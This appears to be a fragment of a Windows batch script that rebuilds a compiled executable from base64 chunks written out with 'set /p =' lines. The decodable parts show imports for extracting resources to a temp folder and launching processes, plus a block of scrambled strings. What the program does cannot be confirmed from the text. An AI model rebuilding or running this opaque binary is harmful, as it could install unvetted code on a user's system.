80EQAfkhjwFuAU0BLAEFABHAwAHGQRABxUEAAcNA8AHHIY8BbgFNASwBBwAQQBAARCAAABDwYAD2QHAA80BgAPMgtwARUIABVkEgAVNBEAFbIOwAxwC1ABFAgAFGQIABRUBwAUNAYAFDIQcAEGAgAGMgIwAQYCAAYyAjABBAEABGIAAAEEAQAEQgAAARkKABl0CQAZZAgAGVQHABk0BgAZMhXAARgIABgyFPAS4BDADnANYAxQCzABBAEABEIAAAEXCAAXdAwAF2QLABc0CgAXchBQAQoEAAo0BgAKMgZwAR8MAB/EDwAfdA4AH2QNAB80DAAfchjgFtAUUAEGAgAGMgIwAQQBAARCAAABBgIABjICMAEZCgAZdAkAGWQIABlUBwAZNAYAGTIVwAEEAQAEYgAAAQQBAARCAAABDQUADTSnAA0BogAGcAAAAQYCAAYyAjABBgIABjICMAEEAQAEQgAAAQoEAAo0BgAKMgZwARkKABl0CQAZZAgAGVQHABk0BgAZMhXAARMEABM0BgATMg9wAQoEAAo0BgAKMgZwARQIABRkCAAUVAcAFDQGABQyEHABFAgAFGQIABRUBwAUNAYAFDIQcAEGAgAGMgIwAQQBAARCAAABBAEABEIAAAEUCgAUNBAAFHIQ8A7gDNAKwAhwB2AGUAEPBgAPZAcADzQGAA8yC3ABGAoAGGQSABhUEQAYNBAAGLIU0BLAEHABBAEABIIAAAEUCAAUZAgAFFQHABQ0BgAUMhBwARQIABRkCgAUVAkAFDQIABRSEHABBAEABEIAAAESCAASVAoAEjQIABIyDsAMcAtgARgKABhkEgAYVBEAGDQQABiyFNASwBBwAQQBAASCAAABBAEABEIAAAEcDAAcZA0AHFQMABw0CgAcMhjwFuAU0BLAEHABGQoAGXQRABlkEAAZVA8AGTQOABmyFcABBAEABIIAAAEEAQAEQgAAAQ8GAA9kBwAPNAYADzILcAEEAQAEQgAAAQoEAAo0BgAKMgZwAQQBAARCAAABHQwAHXQNAB1kDAAdVAsAHTQKAB1SGeAX0BXAARkKABl0CQAZZAgAGVQHABk0BgAZMhXAAQoEAAo0BgAKMgZwAQ8GAA9kCwAPNAoAD3ILcAEPBgAPZAcADzQGAA8yC3ABDwYAD2QHAA80BgAPMgtwAQoEAAo0BgAKMgZwAQ0FAA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FsdWUAAAAAAAAAAEludGVnZXIgb3ZlcmZsb3cAAAAAAAAAAERpdmlzaW9uIGJ5IHplcm8gAAAAAAAAAE1lbW9yeSBwYWdlIGVycm9yAAAAAAAAAElsbGVnYWwgaW5zdHJ1Y3Rpb24AAAAAAEZsb2F0aW5nLXBvaW50IHVuZGVyZmxvdyAoZXhwb25lbnQgdG9vIHNtYWxsKQAAAEZsb2F0aW5nLXBvaW50IHN0YWNrIG92ZXJmbG93IG9yIHVuZGVyZmxvdwAAAAAAAEZsb2F0aW5nLXBvaW50IG92ZXJmbG93IChleHBvbmVudCB0byBncmVhdCkAAAAAAEludmFsaWQgZmxvYXRpbmctcG9pbnQgb3BlcmF0aW9uAAAAAAAAAABJbmV4YWN0IGZsb2F0aW5nLXBvaW50IHJlc3VsdAAAAERpdmlzaW9uIGJ5IHplcm8gKGZsb2F0aW5nLXBvaW50KQAAAAAAAABEZW5vcm1hbCBmbG9hdGluZy1wb2ludCBvcGVyYW5kAE1pc2FsaWduZWQgZGF0YSBhY2Nlc3MAAERlYnVnZ2VyIGJyZWFrcG9pbnQgcmVhY2hlZAAAAAAAQXJyYXkgYm91bmRzIGV4Y2VlZGVkAAAASW52YWxpZCBtZW1vcnkgYWNjZXNzAAAABQAAwAAAAAB4mQFAAQAAAIwAAMAAAAAAYJkBQAEAAAADAACAAAAAAECZAUABAAAAAgAAgAAAAAAomQFAAQAAAI0AAMAAAAAACJkBQAEAAACOAADA
set /p =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
set /p =AACQxQEAAAAAAKLFAQAAAAAAtsUBAAAAAADMxQEAAAAAAN7FAQAAAAAA7sUBAAAAAAD8xQEAAAAAAAzGAQAAAAAAHMYBAAAAAAAkxgEAAAAAADzGAQAAAAAATsYBAAAAAABYxgEAAAAAAGTGAQAAAAAAdsYBAAAAAACKxgEAAAAAAJbGAQAAAAAApMYBAAAAAAC4xgEAAAAAAMrGAQAAAAAA3MYBAAAAAADwxgEAAAAAAPzGAQAAAAAADMcBAAAAAAAaxwEAAAAAACzHAQAAAAAAOMcBAAAAAABExwEAAAAAAFDHAQAAAAAAXMcBAAAAAABuxwEAAAAAAILHAQAAAAAAnMcBAAAAAACoxwEAAAAAALbHAQAAAAAAyMcBAAAAAADexwEAAAAAAOzHAQAAAAAABsgBAAAAAAAWyAEAAAAAADLIAQAAAAAAQMgBAAAAAABSyAEAAAAAAGrIAQAAAAAAfsgBAAAAAACSyAEAAAAAAKbIAQAAAAAAtsgBAAAAAADCyAEAAAAAAM7IAQAAAAAA3sgBAAAAAADuyAEAAAAAAPjIAQAAAAAACMkBAAAAAAAWyQEAAAAAACTJAQAAAAAAAAAAAAAAAABKyQEAAAAAAFzJAQAAAAAAbMkBAAAAAAB8yQEAAAAAAIrJAQAAAAAAoskBAAAAAAC2yQEAAAAAAMbJAQAAAAAA1MkBAAAAAADqyQEAAAAAAPbJAQAAAAAAAsoBAAAAAAASygEAAAAAACbKAQAAAAAAMMoBAAAAAABAygEAAAAAAAAAAAAAAAAAVsoBAAAAAAAAAAAAAAAAAKECbWVtc2V0AABtc3ZjcnQuZGxsAAD3AUdldE1vZHVsZUhhbmRsZUEAAKQCSGVhcENyZWF0ZQAAtANTZXRDb25zb2xlQ3RybEhhbmRsZXIAcQFHZXRDb21tYW5kTGluZUEAfQNSZW1vdmVEaXJlY3RvcnlBAABcAkdldFRlbXBGaWxlTmFtZUEAADoCR2V0U2hvcnRQYXRoTmFtZUEASQJHZXRTeXN0ZW1EaXJlY3RvcnlBAKUCSGVhcERlc3Ryb3kABgFFeGl0UHJvY2VzcwA4AUZpbmRSZXNvdXJjZUEA9QJMb2FkUmVzb3VyY2UAAC4EU2l6ZW9mUmVzb3VyY2UAAEtFUk5FTDMyLmRsbAAAAABDb0luaXRpYWxpemUAAAAAQ29UYXNrTWVtRnJlZQAAAFJldm9rZURyYWdEcm9wAABPTEUzMi5ETEwAAABTaGVsbEV4ZWN1dGVFeEEAU0hFTEwzMi5ETEwAAABQYXRoUXVvdGVTcGFjZXNBAAAAAFBhdGhHZXRBcmdzQQAAAABQYXRoQWRkQmFja3NsYXNoQQAAAFBhdGhSZW5hbWVFeHRlbnNpb25BAAAAAFBhdGhVbnF1b3RlU3BhY2VzQQAAU0hMV0FQSS5ETEwAzgJzdHJuY21wAKACbWVtbW92ZQDPAnN0cm5jcHkA0wJzdHJzdHIAALABX3N0cm5pY21wAKwBX3N0cmljbXAAAMwCc3RybGVuAADGAnN0cmNtcAAAyAJzdHJjcHkAAMQCc3RyY2F0AACfAm1lbWNweQAAvwJzcHJpbnRmAE8CZmFicwAAQQJjZWlsAACZAm1hbGxvYwAAWQJmbG9vcgBkAmZyZWUAAFACZmNsb3NlAADiAnRvbG93ZXIAogJIZWFwQWxsb2MApgJIZWFwRnJlZQAALwRTbGVlcADwAkxvYWRMaWJyYXJ5QQAAIgJHZXRQcm9jQWRkcmVzcwAATgFGcmVlTGlicmFyeQCvAUdldEN1cnJlbnRUaHJlYWRJZAAArAFHZXRDdXJyZW50UHJvY2Vzc0lkAEQAQ2xvc2VIYW5kbGUAuQJJbml0aWFsaXplQ3JpdGljYWxTZWN0aW9uAPUBR2V0TW9kdWxlRmlsZU5hbWVBAADEAUdldEVudmlyb25tZW50VmFyaWFibGVBAN0DU2V0RW52aXJvbm1lbnRWYXJpYWJsZUEAqwFHZXRDdXJyZW50UHJvY2VzcwDWAER1cGxpY2F0ZUhhbmRsZQCTAENyZWF0ZVBpcGUAAD4CR2V0U3RkSGFuZGxlAACWAENyZWF0ZVByb2Nlc3NBAAByBFdhaXRGb3JTaW5nbGVPYmplY3QA2wBFbnRlckNyaXRpY2FsU2VjdGlvbgAA7gJMZWF2ZUNyaXRpY2FsU2VjdGlvbgAAxwFHZXRFeGl0Q29kZVByb2Nlc3MAAHoAQ3JlYXRlRmlsZUEAaANSZWFkRmlsZQAAmwRXcml0ZUZpbGUA7ANTZXRGaWxlUG9pbnRlcgAAwgBEZWxldGVGaWxlQQDWAUdldEZpbGVTaXplAKkCSGVhcFJlQWxsb2MAOwRUZXJtaW5hdGVQcm9jZXNzAACYA1J0bExvb2t1cEZ1bmN0aW9uRW50cnkAAJ8DUnRsVmlydHVhbFVud2luZAAAhQNSZW1vdmVWZWN0b3JlZEV4Y2VwdGlvbkhhbmRsZXIAAA0AQWRkVmVjdG9yZWRFeGNlcHRpb25IYW5kbGVyAHoCR2V0VmVyc2lvbkV4QQD4A1NldExhc3RFcnJvcgAAqwJIZWFwU2l6ZQAAQARUbHNBbGxvYwAAqQFHZXRDdXJyZW50RGlyZWN0b3J5QQAA0wNTZXRDdXJyZW50RGlyZWN0b3J5QQAAXgJHZXRUZW1wUGF0aEEAAOQDU2V0RmlsZUF0dHJpYnV0ZXNBAABuAENyZWF0ZURpcmVjdG9yeUEAAMAARGVsZXRlQ3JpdGljYWxTZWN0aW9uABkDTXVsdGlCeXRlVG9XaWRlQ2hhcgCIBFdpZGVDaGFyVG9NdWx0aUJ5dGUAAABDaGFyVXBwZXJBAAAAAENoYXJMb3dlckEAAAAATWVzc2FnZUJveEEAAABTZW5kTWVzc2FnZUEAAAAAUG9zdE1lc3NhZ2VBAAAAAEdldFdpbmRvd1RocmVhZFByb2Nlc3NJZAAAAABJc1dpbmRvd1Zpc2libGUAAABHZXRXaW5kb3dMb25nUHRyQQAAAEdldEZ